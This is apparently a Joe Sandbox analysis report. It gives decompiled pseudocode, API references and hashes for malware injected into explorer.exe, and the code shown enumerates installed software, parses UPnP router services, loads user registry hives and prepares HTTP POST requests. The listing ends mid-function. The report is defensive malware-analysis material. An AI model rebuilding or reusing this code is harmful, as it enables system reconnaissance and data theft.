				_t222 = 0;
				__eflags = _a16;
				if(__eflags <= 0) {
					L16:
					E01516AF0(__eflags, _v12 + 8, 0x14, 0x32, 0x15394fc);
					_t234 = _t233 + 0x10;
					__eflags = _v16;
					if(_v16 == 0) {
						Sleep(0x1d4c0);
					}
					_t126 = CreateThread(0, 0, E01509A2C, _v12, 0, 0);
					_v16 = _t126;
					__eflags = _t126;
					if(_t126 != 0) {
						_t127 = E01515350(_t203, 0x2b2c);
						_push(0);
						_push(_t127);
						_push(_a8);
						_v20 = _t127;
						_push(0x152a360);
						_push(_a4);
						E01516FF0(0x152a3af,  &_v796, 0xff,  *0x153ac0c);
						E01515460( &_v20);
						_v8 = E01515350(_t203, 0x2a20);
						_t222 = 0x1ff;
						E01513C30( &_v540, 0x1ff, _t132, _v12 + 8);
						_t235 = _t234 + 0x40;
						E01515460( &_v8);
						_v8 = 0;
						__eflags = _a16;
						if(_a16 <= 0) {
							L25:
							_t137 =  &_v540;
							_t218 = _t137 + 1;
							do {
								_t207 =  *_t137;
								_t137 = _t137 + 1;
								__eflags = _t207;
							} while (_t207 != 0);
							_t141 = E01514FB0(_t240,  &_v796,  &_v540, _t137 - _t218,  &_v28,  &_v24, 0);
							_t236 = _t235 + 0x18;
							__eflags = _t141;
							if(_t141 >= 0) {
								E01513BA0( &_v28,  &_v796, 0, 0x100);
								E01513BA0( &_v28,  &_v540, 0, 0x200);
								_t236 = _t236 + 0x18;
								WaitForSingleObject(_v16, 0x88b8);
								_t210 = _a16;
								_v8 = 0;
								__eflags = _t210;
								if(_t210 <= 0) {
									L34:
									_t147 = _a24;
									__eflags = _t147;
									if(_t147 != 0) {
										 *_t147 = _v8;
									}
									goto L36;
								}
								_t164 = _v12 + 0x114;
								__eflags = _t164;
								do {
									__eflags =  *(_t164 + 4);
									if( *(_t164 + 4) != 0) {
										_t222 = _v8;
										_t93 =  &_v8;
										 *_t93 = _v8 + 1;
										__eflags =  *_t93;
										 *((short*)(_a20 + _t222 * 2)) =  *_t164;
									}
									_t164 = _t164 + 0x114;
									_t210 = _t210 - 1;
									__eflags = _t210;
								} while (_t210 != 0);
								goto L34;
							}
							_v8 = 0xfffffffd;
							TerminateThread(_v16, 0);
							goto L36;
						}
						_v20 = 0;
						do {
							__eflags = _v8;
							if(_v8 > 0) {
								lstrcatA( &_v540, ",");
							}
							_t169 = lstrlenA( &_v540);
							E01513C30(_t232 + lstrlenA( &_v540) - 0x218, _t222 - _t169, 0x152a370,  *(_v20 + _v12 + 0x114) & 0x0000ffff);
							_v20 = _v20 + 0x114;
							_t235 = _t235 + 0x10;
							_v8 = _v8 + 1;
							__eflags = _v8 - _a16;
						} while (_v8 < _a16);
						goto L25;
					} else {
						_v8 = 0xfffffffe;
						L36:
						CloseHandle(_v16);
						__eflags = _v12;
						if(_v12 == 0) {
							L44:
							E01513990( &_v12, 0x114010c);
							E01513990( &_v28, _v24);
							return _v8;
						}
						_t154 = _a16;
						__eflags = _t154;
						if(_t154 <= 0) {
							goto L44;
						}
						_t201 = __imp__#3;
						_t226 = 0;
						__eflags = 0;
						_v16 = _t154;
						do {
							_t156 =  *(_t226 + _v12 + 0x10c);
							_t222 = _t222 | 0xffffffff;
							__eflags = _t156 - _t222;
							if(_t156 != _t222) {
								 *_t201(_t156);
								 *(_t226 + _v12 + 0x10c) = _t222;
							}
							_t158 =  *(_t226 + _v12 + 0x110);
							__eflags = _t158 - _t222;
							if(_t158 != _t222) {
								 *_t201(_t158);
								 *(_t226 + _v12 + 0x110) = _t222;
							}
							_t226 = _t226 + 0x114;
							_t115 =  &_v16;
							 *_t115 = _v16 - 1;
							__eflags =  *_t115;
						} while ( *_t115 != 0);
						goto L44;
					}
				} else {
					_t229 = 0;
					__eflags = 0;
					do {
						 *((short*)(_t229 + _v12 + 0x114)) =  *(_a12 + _t222 * 2);
						_t180 = E015160D0( *(_a12 + _t222 * 2) & 0x0000ffff, 0,  *(_a12 + _t222 * 2) & 0x0000ffff);
						_t203 = _v12;
						 *((intOrPtr*)(_t229 + _v12 + 0x10c)) = _t180;
						_t181 = _v12;
						__eflags =  *(_t229 +  &(_t181[0x43]));
						if( *(_t229 +  &(_t181[0x43])) >= 0) {
							 *_t181 =  *_t181 + 1;
							__eflags =  *_t181;
							_t181 = _v12;
						}
						 *(_t229 +  &(_t181[0x44])) =  *(_t229 +  &(_t181[0x44])) | 0xffffffff;
						 *((intOrPtr*)(_t229 + _v12 + 0x118)) = 0;
						 *((intOrPtr*)(_v12 + 0x108)) =  *((intOrPtr*)(_v12 + 0x108)) + 1;
						_t222 = _t222 + 1;
						_t229 = _t229 + 0x114;
						__eflags = _t222 - _a16;
					} while (__eflags < 0);
					goto L16;
				}
			}

0x01509d8e
0x01509d9f
0x01509da2
0x01509da5
0x01509da8
0x01509dab
0x01509db0
0x01509db1
0x01509db6
0x00000000
0x01509db8
0x01509dc0
0x01509dc7
0x01509dca
0x01509e0f
0x01509e14
0x01509e16
0x01509e1d
0x01509e22
0x01509e28
0x01509e3d
0x01509e46
0x01509e4b
0x01509e4b
0x01509dcc
0x01509dcc
0x01509dd3
0x01509dda
0x01509ddf
0x01509dec
0x01509dfc
0x01509e05
0x01509e0a
0x01509e0a
0x01509dd3
0x01509e50
0x01509e57
0x01509e69
0x01509e6e
0x01509e71
0x01509e73
0x01509e7a
0x01509e7d
0x01509e7d
0x01509e90
0x01509e95
0x01509e95
0x01509e98
0x01509e9a
0x01509e9d
0x01509f03
0x01509f13
0x01509f18
0x01509f1b
0x01509f1e
0x01509f25
0x01509f25
0x01509f37
0x01509f3d
0x01509f40
0x01509f42
0x01509f55
0x01509f5a
0x01509f5b
0x01509f5c
0x01509f5f
0x01509f62
0x01509f67
0x01509f81
0x01509f8a
0x01509fa1
0x01509fa4
0x01509fb1
0x01509fb9
0x01509fbd
0x01509fc3
0x01509fc6
0x01509fc9
0x0150a038
0x0150a038
0x0150a03e
0x0150a041
0x0150a041
0x0150a043
0x0150a044
0x0150a044
0x0150a062
0x0150a067
0x0150a06a
0x0150a06c
0x0150a08e
0x0150a0a0
0x0150a0a5
0x0150a0b0
0x0150a0b6
0x0150a0b9
0x0150a0bc
0x0150a0be
0x0150a0e5
0x0150a0e5
0x0150a0e8
0x0150a0ea
0x0150a0ef
0x0150a0ef
0x00000000
0x0150a0ea
0x0150a0c3
0x0150a0c3
0x0150a0c8
0x0150a0c8
0x0150a0cb
0x0150a0cd
0x0150a0d6
0x0150a0d6
0x0150a0d6
0x0150a0d9
0x0150a0d9
0x0150a0dd
0x0150a0e2
0x0150a0e2
0x0150a0e2
0x00000000
0x0150a0c8
0x0150a072
0x0150a079
0x00000000
0x0150a079
0x01509fd1
0x01509fd4
0x01509fd4
0x01509fd7
0x01509fe5
0x01509fe5
0x0150a006
0x0150a01e
0x0150a023
0x0150a02a
0x0150a02d
0x0150a033
0x0150a033
0x00000000
0x01509f44
0x01509f44
0x0150a0f1
0x0150a0f4
0x0150a0fa
0x0150a0fd
0x0150a155
0x0150a15e
0x0150a16a
0x00000000
0x0150a176
0x0150a0ff
0x0150a102
0x0150a104
0x00000000
0x00000000
0x0150a106
0x0150a10c
0x0150a10c
0x0150a10e
0x0150a111
0x0150a114
0x0150a11b
0x0150a11e
0x0150a120
0x0150a123
0x0150a128
0x0150a128
0x0150a132
0x0150a139
0x0150a13b
0x0150a13e
0x0150a143
0x0150a143
0x0150a14a
0x0150a150
0x0150a150
0x0150a150
0x0150a150
0x00000000
0x0150a111
0x01509e9f
0x01509e9f
0x01509e9f
0x01509ea1
0x01509ead
0x01509eba
0x01509ec1
0x01509ec4
0x01509ecb
0x01509ece
0x01509ed5
0x01509ed7
0x01509ed7
0x01509ed9
0x01509ed9
0x01509edc
0x01509ee7
0x01509ef1
0x01509ef7
0x01509ef8
0x01509efe
0x01509efe
0x00000000
0x01509ea1

APIs

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

Sleep.KERNEL32(00001388), ref: 01509E7D
Sleep.KERNEL32(0001D4C0), ref: 01509F25
CreateThread.KERNEL32(00000000,00000000,Function_00009A2C,?,00000000,00000000), ref: 01509F37

Strings

C:\Windows\explorer.exe, xrefs: 01509DDF, 01509E2B

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Sleep$AllocCreateHeapThread
String ID: C:\Windows\explorer.exe
API String ID: 1664469004-2858086631
Opcode ID: efbf565a5d4c09a713767972ed20bfc08c1a283bbfde58681d00bb4094875ab2
Instruction ID: a57e3fa80c2d47e10abdff11a29c80dcba80182cbbd16e3f2e5eefcc72cc8901
Opcode Fuzzy Hash: efbf565a5d4c09a713767972ed20bfc08c1a283bbfde58681d00bb4094875ab2
Instruction Fuzzy Hash: C0C18271D0020EAFDB22DFA4CC859EEB7B8FF54314F4045A9E615AB285E7749A84CB60

Uniqueness

Uniqueness Score: 100.00%

Function 01506C0A, Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 190
registryUNIQUE

Download Yara Rule

C-Code - Quality: 79%

			E01506C0A(void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v12;
				int _v16;
				void* _v20;
				char _v24;
				int _v28;
				int _v32;
				char _v288;
				char _v544;
				char _v800;
				char _v1312;
				signed int _t50;
				char _t69;
				char _t71;
				void* _t90;
				void* _t107;
				void* _t108;
				void* _t109;

				_v20 = 0;
				_v16 = 0;
				E01513C30();
				_t108 = _t107 + 0xc;
				_t50 =  *0x153aac8(0x80000002,  &_v544, 0, 0x20019,  &_v20,  &_v544, 0xfe,  *0x153ac08);
				if(_t50 == 0) {
					if(RegQueryInfoKeyA(_v20, 0, 0, 0,  &_v16,  &_v32, 0, 0, 0, 0, 0, 0) == 0) {
						if(_v16 == 0) {
							L22:
							RegCloseKey(_v20);
							return 1;
						} else {
							goto L5;
						}
						do {
							L5:
							_v28 = 0xff;
							if(RegEnumKeyExA(_v20, _v16 - 1,  &_v800,  &_v28, 0, 0, 0, 0) == 0) {
								_push(0);
								_push( &_v800);
								_v8 = 0;
								_v24 = 0;
								_v12 = 0;
								E01516FF0("\\",  &_v288, 0x100,  &_v544);
								_v12 = E0151C360(0x80000002,  &_v288, "Publisher", 0);
								_t69 = E0151C360(0x80000002,  &_v288, "DisplayName", 0);
								_t109 = _t108 + 0x38;
								_v8 = _t69;
								if(_v12 == 0 || _t69 == 0 || E01513DD0(_v12, "Microsoft") == 0 || E01516B80(_v8, "Update") == 0 && E01516B80(_v8, "Hotfix") == 0) {
									_t71 = E0151C360(0x80000002,  &_v288, "DisplayVersion", 0);
									_t108 = _t109 + 0x10;
									_v24 = _t71;
									if(_v8 != 0) {
										if(_t71 == 0) {
											_t71 = 0x152a3af;
										}
										_push(_t71);
										E01513C30( &_v1312, 0x200, "%s;%s|", _v8);
										E01519300(_a4,  &_v1312);
										E01513990( &_v8, 0);
										_t108 = _t108 + 0x24;
									}
									if(_v24 != 0) {
										E01513990( &_v24, 0);
									}
									if(_v12 != 0) {
										E01513990( &_v12, 0);
									}
									RegCloseKey(0);
									Sleep(1);
								} else {
									E01513990( &_v12, 0);
									E01513990( &_v8, 0);
									_t108 = _t109 + 0x10;
								}
							}
							_t43 =  &_v16;
							 *_t43 = _v16 - 1;
						} while ( *_t43 != 0);
						goto L22;
					}
					_t90 = 0xfffffffe;
					return _t90;
				}
				return _t50 | 0xffffffff;
			}

0x01506c29
0x01506c2c
0x01506c2f
0x01506c34
0x01506c4e
0x01506c56
0x01506c7c
0x01506c90
0x01506e10
0x01506e13
0x00000000
0x00000000
0x00000000
0x00000000
0x01506c96
0x01506c96
0x01506cad
0x01506cbc
0x01506cc2
0x01506cc9
0x01506ce2
0x01506ce5
0x01506ce8
0x01506ceb
0x01506d04
0x01506d14
0x01506d19
0x01506d1c
0x01506d22
0x01506d8b
0x01506d90
0x01506d93
0x01506d99
0x01506d9d
0x01506d9f
0x01506d9f
0x01506da4
0x01506db9
0x01506dc8
0x01506dd2
0x01506dd7
0x01506dd7
0x01506ddd
0x01506de4
0x01506dea
0x01506dee
0x01506df5
0x01506dfb
0x01506dfd
0x01506e01
0x01506d61
0x01506d66
0x01506d70
0x01506d75
0x01506d75
0x01506d22
0x01506e07
0x01506e07
0x01506e07
0x00000000
0x01506c96
0x01506c80
0x00000000
0x01506c80
0x00000000

APIs

Part of subcall function 01513C30: wvnsprintfA.SHLWAPI(?,?,?,00000000,?,?,?,jkfkdm,00000000), ref: 01513C5E
Part of subcall function 01513C30: lstrlenA.KERNEL32(00000000), ref: 01513C82

RegQueryInfoKeyA.ADVAPI32(00093A80,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00040000), ref: 01506C74

Strings

Microsoft, xrefs: 01506D28
DisplayName, xrefs: 01506D07
DisplayVersion, xrefs: 01506D7E
Hotfix, xrefs: 01506D4E
%s;%s|, xrefs: 01506DAE
Update, xrefs: 01506D3B
Publisher, xrefs: 01506CF1

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: InfoQuerylstrlenwvnsprintf
String ID: %s;%s|$DisplayName$DisplayVersion$Hotfix$Microsoft$Publisher$Update
API String ID: 962194100-3948043603
Opcode ID: b55342a30925a2b48ee0caadca546d4787a0f1ade3e1921e68268cefce3feb5a
Instruction ID: d8756024cc47ef6505b6f99ae5d46344d2500b253b4234e0a9be60e36ce894d3
Opcode Fuzzy Hash: b55342a30925a2b48ee0caadca546d4787a0f1ade3e1921e68268cefce3feb5a
Instruction Fuzzy Hash: 1C519DB2D4122EBAEB22DA95DC45DEFBBBCFF45610F100056F514EA084E7309B80DBA0

Uniqueness

Uniqueness Score: 100.00%

Function 0150D150, Relevance: 21.1, APIs: 9, Strings: 5, Instructions: 99
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0150D150(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v8;
				int _t25;
				int _t28;
				int _t31;
				int _t34;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;

				_v8 = _a4;
				_t25 = _v8;
				 *((intOrPtr*)(_t25 + 0x180)) =  *((intOrPtr*)(_v8 + 0x180)) - 1;
				if(_a12 == 7) {
					_push(_a12);
					_push("service");
					_push(_a8);
					L015077DC();
					_t66 = _t65 + 0xc;
					if(_t25 == 0) {
						_t28 = strcmp(_v8 + 0xb04, "urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1");
						_t67 = _t66 + 8;
						if(_t28 == 0) {
							return memcpy(_v8 + 0x184, _v8 + 0x984, 0x200);
						}
						_t31 = strcmp(_v8 + 0xb04, "urn:schemas-upnp-org:service:WANIPv6FirewallControl:1");
						_t68 = _t67 + 8;
						if(_t31 == 0) {
							return memcpy(_v8 + 0x784, _v8 + 0x984, 0x200);
						}
						_t34 = strcmp(_v8 + 0xb04, "urn:schemas-upnp-org:service:WANIPConnection:1");
						_t69 = _t68 + 8;
						if(_t34 == 0) {
							L8:
							if( *((char*)(_v8 + 0x504)) != 0) {
								return memcpy(_v8 + 0x584, _v8 + 0x984, 0x200);
							}
							return memcpy(_v8 + 0x384, _v8 + 0x984, 0x200);
						}
						_t25 = strcmp(_v8 + 0xb04, "urn:schemas-upnp-org:service:WANPPPConnection:1");
						_t69 = _t69 + 8;
						if(_t25 == 0) {
							goto L8;
						}
					}
				}
				return _t25;
			}

0x0150d157
0x0150d166
0x0150d169
0x0150d173
0x0150d17c
0x0150d17d
0x0150d185
0x0150d186
0x0150d18b
0x0150d190
0x0150d1a4
0x0150d1a9
0x0150d1ae
0x00000000
0x0150d1ce
0x0150d1e4
0x0150d1e9
0x0150d1ee
0x00000000
0x0150d20e
0x0150d224
0x0150d229
0x0150d22e
0x0150d24b
0x0150d257
0x00000000
0x0150d299
0x00000000
0x0150d277
0x0150d23f
0x0150d244
0x0150d249
0x00000000
0x00000000
0x0150d249
0x0150d190
0x0150d29f

APIs

memcmp.MSVCRT(?,service,00000007), ref: 0150D186
strcmp.MSVCRT(?,urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1), ref: 0150D1A4
memcpy.MSVCRT(?,?,00000200), ref: 0150D1C9
strcmp.MSVCRT(?,urn:schemas-upnp-org:service:WANIPv6FirewallControl:1), ref: 0150D1E4
memcpy.MSVCRT(?,?,00000200), ref: 0150D209

Strings

urn:schemas-upnp-org:service:WANPPPConnection:1, xrefs: 0150D230
urn:schemas-upnp-org:service:WANIPConnection:1, xrefs: 0150D216
urn:schemas-upnp-org:service:WANIPv6FirewallControl:1, xrefs: 0150D1D6
urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1, xrefs: 0150D196
service, xrefs: 0150D17D

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memcpystrcmp$memcmp
String ID: service$urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1$urn:schemas-upnp-org:service:WANIPConnection:1$urn:schemas-upnp-org:service:WANIPv6FirewallControl:1$urn:schemas-upnp-org:service:WANPPPConnection:1
API String ID: 3598254015-1700123361
Opcode ID: 01567d1348e66fba3baf1d94a4506ff62d76f2d395316793e3017ef5eaa0b42f
Instruction ID: eed6d66dd7d23d3366c7cf4382cdb68ca4780351b96e7682423adac2d5c8fdca
Opcode Fuzzy Hash: 01567d1348e66fba3baf1d94a4506ff62d76f2d395316793e3017ef5eaa0b42f
Instruction Fuzzy Hash: C93168B2A00206ABEB05DBD8CD81F6F7374BF91718F148568E9086F382E674DB10E794

Uniqueness

Uniqueness Score: 10.55%

Function 0150D2A0, Relevance: 19.6, APIs: 7, Strings: 6, Instructions: 90
stringUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E0150D2A0(char* _a4, void* _a8, int _a12) {
				char* _v8;
				void* _v12;
				int _t31;
				int _t33;
				int _t34;
				int _t35;
				int _t37;
				void* _t39;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;

				_v8 = _a4;
				_v12 = 0;
				_t31 = strcmp(_v8, "URLBase");
				_t59 = _t58 + 8;
				if(_t31 != 0) {
					_t33 = strcmp(_v8, "presentationURL");
					_t60 = _t59 + 8;
					if(_t33 != 0) {
						_t34 = strcmp(_v8, "serviceType");
						_t61 = _t60 + 8;
						if(_t34 != 0) {
							_t35 = strcmp(_v8, "controlURL");
							_t62 = _t61 + 8;
							if(_t35 != 0) {
								_t37 = strcmp(_v8, "eventSubURL");
								_t63 = _t62 + 8;
								if(_t37 != 0) {
									_t37 = strcmp(_v8, "SCPDURL");
									_t63 = _t63 + 8;
									if(_t37 == 0) {
										_t37 =  &(_v8[0xa84]);
										_v12 = _t37;
									}
								} else {
									_v12 =  &(_v8[0xa04]);
								}
							} else {
								_v12 =  &(_v8[0x984]);
							}
						} else {
							_t37 =  &(_v8[0xb04]);
							_v12 = _t37;
						}
					} else {
						_v12 =  &(_v8[0x100]);
					}
				} else {
					_v12 =  &(_v8[0x80]);
				}
				if(_v12 != 0) {
					if(_a12 >= 0x80) {
						_a12 = 0x7f;
					}
					_t39 = memcpy(_v12, _a8, _a12);
					 *((char*)(_v12 + _a12)) = 0;
					return _t39;
				}
				return _t37;
			}

0x0150d2a9
0x0150d2ac
0x0150d2bc
0x0150d2c1
0x0150d2c6
0x0150d2e2
0x0150d2e7
0x0150d2ec
0x0150d308
0x0150d30d
0x0150d312
0x0150d32a
0x0150d32f
0x0150d334
0x0150d34d
0x0150d352
0x0150d357
0x0150d370
0x0150d375
0x0150d37a
0x0150d37f
0x0150d384
0x0150d384
0x0150d359
0x0150d362
0x0150d362
0x0150d336
0x0150d33f
0x0150d33f
0x0150d314
0x0150d317
0x0150d31c
0x0150d31c
0x0150d2ee
0x0150d2f7
0x0150d2f7
0x0150d2c8
0x0150d2d1
0x0150d2d1
0x0150d38b
0x0150d394
0x0150d396
0x0150d396
0x0150d3a9
0x0150d3b7
0x00000000
0x0150d3b7
0x0150d3bd

APIs

strcmp.MSVCRT(?,URLBase), ref: 0150D2BC
strcmp.MSVCRT(?,presentationURL), ref: 0150D2E2
memcpy.MSVCRT(00000000,?,00000080), ref: 0150D3A9

Strings

presentationURL, xrefs: 0150D2D9
serviceType, xrefs: 0150D2FF
SCPDURL, xrefs: 0150D367
eventSubURL, xrefs: 0150D344
controlURL, xrefs: 0150D321
URLBase, xrefs: 0150D2B3

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: strcmp$memcpy
String ID: SCPDURL$URLBase$controlURL$eventSubURL$presentationURL$serviceType
API String ID: 3918879902-286344544
Opcode ID: 4dfeb6bbc251642e7171f1c8fe6a2649c83887d267d2e98a335987f89f0f6583
Instruction ID: fb820cab2e46202d95d4780d9d6c1b2bb22712360372d683ad2d93d045b6cb76
Opcode Fuzzy Hash: 4dfeb6bbc251642e7171f1c8fe6a2649c83887d267d2e98a335987f89f0f6583
Instruction Fuzzy Hash: A9313AB2A0024AEBDF05DFD8CD81BAEB7B5BF94705F244468E9046F280E674DB10CB91

Uniqueness

Uniqueness Score: 100.00%

Function 0150E350, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 165stringUNIQUE

Download Yara Rule

APIs

memset.MSVCRT(?,00000000,00000020), ref: 0150E361

Part of subcall function 01513C30: wvnsprintfA.SHLWAPI(?,?,?,00000000,?,?,?,jkfkdm,00000000), ref: 01513C5E
Part of subcall function 01513C30: lstrlenA.KERNEL32(00000000), ref: 01513C82

memcmp.MSVCRT(00000001,%25,00000003), ref: 0150E429
strncpy.MSVCRT(?,00000000,00000040), ref: 0150E460
getaddrinfo.WS2_32(?,?,00000008,?), ref: 0150E47F
#23.WS2_32(?,?,?), ref: 0150E4D6
#4.WS2_32(00000000,?,?), ref: 0150E525
#3.WS2_32(00000000), ref: 0150E538

Strings

@, xrefs: 0150E3FA
%hu, xrefs: 0150E383
%25, xrefs: 0150E41A

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: getaddrinfolstrlenmemcmpmemsetstrncpywvnsprintf
String ID: %25$%hu$@
API String ID: 2121597948-2908503938
Opcode ID: 730fa539009454a29c9d5c96b746e3e7847a0e97dd5d317fc51459824c5cbabe
Instruction ID: 4cae050d8225dc046981a1815546184755bbe34e139f5a5058c0d850cece3bd8
Opcode Fuzzy Hash: 730fa539009454a29c9d5c96b746e3e7847a0e97dd5d317fc51459824c5cbabe
Instruction Fuzzy Hash: 90617D75D00218DFDB25CF98C885BADBBB1FF85304F24C989E955AB281EB319A84CF50

Uniqueness

Uniqueness Score: 100.00%

Function 004010A0, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 334stringUNIQUE

Download Yara Rule

APIs

memset.MSVCRT(?,00000000,000000FF), ref: 00401114
memset.MSVCRT(?,00000000,000000FF), ref: 00401136
lstrlenA.KERNEL32(?,00000000,?), ref: 00401201
GetLastError.KERNEL32 ref: 00401297
GetLastError.KERNEL32 ref: 00401301
GetLastError.KERNEL32 ref: 004013B5
lstrlenA.KERNEL32(?,?,?), ref: 00401427
GetLastError.KERNEL32 ref: 00401480

Part of subcall function 00400F80: GetLastError.KERNEL32 ref: 00400FA5

GetLastError.KERNEL32 ref: 00401562

Strings

<, xrefs: 004011EA
Content-Type: application/x-www-form-urlencoded, xrefs: 00401143
POST, xrefs: 0040134F

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: ErrorLast$lstrlenmemset
String ID: <$Content-Type: application/x-www-form-urlencoded$POST
API String ID: 4043594366-2842678110
Opcode ID: 8e68906be87ddd01e8701e47ad47bc2a98acca6585b2bed896372a1be8060f40
Instruction ID: 2208d5798443745b9535c589531f8c7b71a12005b7327b32149956360ca6d0f0
Opcode Fuzzy Hash: 8e68906be87ddd01e8701e47ad47bc2a98acca6585b2bed896372a1be8060f40
Instruction Fuzzy Hash: 77E13CB4905218DBDB20CF60DC48BEEB7B4BB58304F1082EAE549B62A0DB755EC5CF59

Uniqueness

Uniqueness Score: 100.00%

Function 003FE7F0, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 212
stringregistryUNIQUE

Download Yara Rule

C-Code - Quality: 35%

			E003FE7F0(void* __ecx, void* __fp0, intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				short* _v8;
				signed int _v12;
				char _v16;
				char _v540;
				intOrPtr _v544;
				char _v548;
				signed int _v552;
				short* _v556;
				char _v560;
				char _v692;
				char _v756;
				char _v760;
				char _v1284;
				char _t57;
				signed int _t81;
				signed int _t85;
				short* _t86;
				long _t88;
				signed int _t90;
				long _t92;
				signed int _t99;
				CHAR* _t103;
				void* _t126;
				void* _t127;
				void* _t130;
				void* _t131;
				void* _t138;
				void* _t139;
				void* _t141;

				_t141 = __fp0;
				_v552 = 0;
				_v12 = 0;
				_v8 = 0;
				_v548 = 0;
				_v560 = 0;
				_v16 = 0;
				_v556 = 0;
				_v544 = 0x104;
				_t57 = E003FC710(__ecx, _a8, 0);
				_t127 = _t126 + 8;
				_v16 = _t57;
				if(_v16 != 0) {
					_push( &_v8);
					_push(_a4);
					L0040042E();
					_v560 = E003F7F40( &_v8, 0x15a4);
					_push(0);
					_push(_v560);
					_push(0x4087f0);
					_push(_v8);
					_push(0x4087f0);
					_v548 = E003F4CB0(_v8);
					E003F8170( &_v560);
					_t130 = _t127 + 0x20;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					E004001E0(_a4,  &_v540, 0x208);
					_t131 = _t130 + 0xc;
					_t99 =  *0x411408; // 0x0
					_t100 = _t99 & 0x00000001;
					__eflags = _t99 & 0x00000001;
					if((_t99 & 0x00000001) != 0) {
						_v552 = 0xffffffff;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						L24:
						__eflags = _v552;
						if(_v552 >= 0) {
							L36:
							E003F3F10( &_v548, 0xffffffff);
							E003F3F10( &_v16, 0xffffffff);
							LocalFree(_v8);
							__eflags = 0;
							return 0;
						}
						_v760 = 0;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						lstrcpyA( &_v756, _a12);
						_t103 =  *0x4117f8; // 0x15a081d
						lstrcatA( &_v756, _t103);
						E003F4BD0( &_v756,  &_v756,  &_v692, 0x40);
						E003FDEC0(7,  &_v1284);
						_v760 = E003F4CB0( &_v540);
						__imp__CoInitialize(0, 0x4087f0,  &_v1284, 0x4087f0,  &_v692, 0);
						_t81 = E003FDDA0(_v16, 0x405240, _v760, L"shell32.dll", E003F8A50(__eflags, _t141, 0x4101bc, 1, 0x64));
						_t138 = _t131 + 0x4c;
						__eflags = _t81;
						if(_t81 >= 0) {
							while(1) {
								__eflags = 0;
								if(0 == 0) {
									break;
								}
							}
							_v552 = 0;
							L35:
							__imp__CoUninitialize();
							E003F3F10( &_v760, 0xfffffffe);
							_t131 = _t138 + 8;
							goto L36;
						} else {
							goto L29;
						}
						while(1) {
							L29:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_v552 = 0xfffffffd;
						goto L35;
					}
					_t85 = E003FC9C0(_t100, 0x80000003, _v548, _v16);
					_t131 = _t131 + 0xc;
					_v552 = _t85;
					__eflags = _v552 - 0xffffffff;
					if(_v552 != 0xffffffff) {
						L20:
						goto L24;
					}
					_push(0);
					_push(L"NTUSER_DAT");
					_push(0x4087f0);
					_t86 = E003F4CB0( &_v540);
					_t139 = _t131 + 0x10;
					_v556 = _t86;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t88 = RegLoadKeyW(0x80000003, _v8, _v556);
					__eflags = _t88;
					if(_t88 == 0) {
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t90 = E003FC9C0(_v16, 0x80000003, _v548, _v16);
						_t139 = _t139 + 0xc;
						_v552 = _t90;
						_t92 = RegUnLoadKeyW(0x80000003, _v8);
						__eflags = _t92;
						if(_t92 == 0) {
							L19:
							E003F3F10( &_v556, 0xfffffffe);
							_t131 = _t139 + 8;
							goto L20;
						} else {
							goto L17;
						}
						while(1) {
							L17:
							__eflags = 0;
							if(0 == 0) {
								goto L19;
							}
						}
						goto L19;
					} else {
						goto L11;
					}
					while(1) {
						L11:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					goto L19;
				}
				return 0xfffffffe;
			}

0x003fe7f0
0x003fe7f9
0x003fe803
0x003fe80a
0x003fe811
0x003fe81b
0x003fe825
0x003fe82c
0x003fe836
0x003fe846
0x003fe84b
0x003fe84e
0x003fe855
0x003fe864
0x003fe868
0x003fe869
0x003fe87b
0x003fe881
0x003fe889
0x003fe88a
0x003fe892
0x003fe893
0x003fe8a4
0x003fe8b1
0x003fe8b6
0x003fe8b9
0x003fe8b9
